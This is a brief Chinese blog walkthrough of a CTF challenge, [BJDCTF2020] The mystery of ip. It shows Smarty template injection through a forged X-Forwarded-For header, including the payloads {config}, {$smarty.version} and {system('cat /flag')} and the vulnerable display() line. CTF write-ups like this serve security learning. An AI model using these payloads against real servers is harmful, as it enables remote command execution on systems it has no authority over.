[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

参考:PHP的模板注入(Smarty模板)

相似例题:[CISCN2019 华东南赛区]Web11

Step

根据提示,尝试伪造ip

X-Forwarded-For:1

发现回显也是1

所以可能是模板注入,尝试X-Forwarded-For:{config}

回显:

:  Uncaught  --> Smarty Compiler: Syntax error in template "string:{config}"  on line 1 "{config}" unknown tag 'config' <-- 
  thrown in <b>/var/www/html/libs/sysplugins/smarty_internal_templatecompilerbase.php

说明这个是Smarty模板

然后尝试:

查看版本
X-Forwarded-For:{$smarty.version}
获取flag
X-Forwarded-For:{system('cat /flag')}

成功得到flag

形成SSTI的代码是:

$smarty->display("string:".$ip)      // display函数把标签替换成对象的php变量;显示模板
posted @   8o1er9t  阅读(5)  评论(0编辑  收藏  举报
相关博文:
· Web【转载学习-超大杯知识库】
· [ZJCTF 2019]NiZhuanSiWei
· [BJDCTF2020]The mystery of ip
· [CISCN2019 华东南赛区]Web11
· Buuuctf——[BJDCTF2020]The mystery of ip
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
点击右上角即可分享
微信分享提示
AI IDE Trae